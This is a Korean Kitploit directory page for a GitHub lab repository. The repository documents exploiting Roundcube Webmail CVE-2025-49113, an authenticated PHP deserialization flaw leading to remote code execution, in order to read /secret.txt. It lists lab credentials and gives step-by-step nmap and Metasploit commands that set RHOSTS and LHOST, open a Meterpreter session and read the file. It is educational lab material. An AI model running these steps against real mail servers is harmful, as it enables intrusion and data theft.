Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
roundcube-cve-2025-49113-lab — Roundcube Webmail CVE-2025-49113(인증된 PHP 객체 역직렬화 → RCE)을 활용해 /secret.txt를 읽는 실습형 익스플로잇 랩 | Kitploit
도구/GitHubGitHub/ankitpandey383/roundcube-cve-2025-49113-lab
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & EducationRed TeamingPayload Development
Labs & Practice
GitHubankitpandey383/roundcube-cve-2025-49113-lab

roundcube-cve-2025-49113-lab

Roundcube Webmail CVE-2025-49113(인증된 PHP 객체 역직렬화 → RCE)을 활용해 /secret.txt를 읽는 실습형 익스플로잇 랩

저장소 보기
39개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

면책 고지: 교육 목적으로만 사용

Roundcube Webmail RCE – CVE-2025-49113 랩

이 저장소는 제가 통제된 랩 환경에서 Roundcube Webmail CVE-2025-49113을 단계별로 익스플로잇하여 /secret.txt에 저장된 비밀을 획득한 과정을 기록합니다.

⚠️ 면책 조항
모든 작업은 테스트가 승인된 랩/교육 환경에서 수행되었습니다.
소유하거나 관리하지 않는 시스템에는 이러한 기법을 사용하지 마십시오.


챌린지

Roundcube Webmail은 IMAP을 통해 사서함에 연결하고 SMTP를 통해 메일을 전송하는 브라우저 기반 오픈소스 PHP 이메일 클라이언트입니다. 일반적으로 Apache 또는 Nginx에서 MySQL/PostgreSQL/SQLite와 함께 실행되며 공유 호스팅 환경에서 널리 사용됩니다.

취약점 – CVE-2025-49113

1.6.10까지의 모든 Roundcube 버전(및 1.5.10 이전의 1.5.x 버전)에는 program/actions/settings/upload.php에 치명적인 버그가 있습니다. _from 매개변수가 제대로 검증되지 않아 인증된 공격자가 안전하지 않은 PHP 객체 역직렬화를 트리거하고 웹 서버 권한으로 원격 코드 실행을 달성할 수 있습니다.

랩 자격 증명:

  • 사용자 이름:
roundcube
  • 비밀번호: rcpass
  • 목표:

    /secret.txt 파일 안에 있는 비밀은 무엇일까요?


    랩 환경

    • 공격자 호스트: Kali / HackerBox, 사용 도구:
      • nmap
      • msfconsole (Metasploit 6)
    • 대상 호스트: 172.20.2.57의 Roundcube Webmail
    • 사용된 익스플로잇: exploit/multi/http/roundcube_auth_rce_cve_2025_49113

    실습 과정

    1단계 – Nmap으로 서비스 탐색

    명령어: nmap -sV Target Machine

    2단계 - Metasploit에서 PHP 객체 역직렬화 익스플로잇 찾기

    search php object deserialization

    3단계 - Roundcube 익스플로잇 모듈 구성

    msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine

    4단계 - Meterpreter 세션 확보 및 /secret.txt 읽기

    meterpreter > cat /secret.txt

    도구 다운로드